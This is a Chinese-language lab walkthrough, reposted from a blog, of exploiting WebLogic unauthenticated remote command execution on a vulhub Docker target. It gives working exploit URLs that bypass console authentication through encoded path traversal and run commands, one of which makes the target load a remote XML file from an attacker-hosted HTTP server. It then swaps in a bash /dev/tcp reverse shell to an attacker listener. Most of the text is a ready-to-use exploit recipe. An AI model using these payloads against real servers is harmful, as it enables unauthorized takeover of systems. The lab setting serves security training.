weblogic

1. weblogic未授权命令执行

打开vulhub靶机，定位到weblogic未授权命令执行的目录下，然后使用docker-compose up -d命令启动docker

查看靶机内网地址：192.168.187.130

浏览器访问：192.168.187.130:7001/console

1.2 第二种方法

利用未授权漏洞进行访问，访问以下 URL，即可未授权访问到管理,后台页面：192.168.187.130:7001/console/css/%252e%252e%252fconsole.portal

此时发现我们是最低权限用户，直接访问如下URL：
http://192.168.187.130:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runtime.getRuntime().exec(‘touch%20/tmp/success1’);”)

得到404页面，到容器中查看文件是否被创建

用docker ps，查看容器id

再使用命令：docker exec -I -t ec6038370df2 /bin/bash

进入tmp目录下，发现success1文件已经被创建成功

1.2  第二种方法

编写一个rce.xml文件，放在python目录下

运行python并输入命令python -m http.server 8000

利用如下url加载xml文档

http://192.168.187.130:7001/console/css/%252e%252e%252fconsole.portal?_n
fpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.c
ontext.support.FileSystemXmlApplicationContext("http://10.133.200.191:
8000/rce.xml")

发现得到了许多200的数据包

再去靶机中发现已经多了一个success2文件

编写反弹shell，将 xml 文档中的 touch /tmp/success2 命令改为反弹 shell 命令:bash -i >& /dev/tcp/192.168.0.93/6666 0>&1

重新访问url，同时kali设置监听端口6666

访问完后发现已经得到了靶机的webshell

原文地址：https://blog.csdn.net/weixin_62512865/article/details/144166578

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！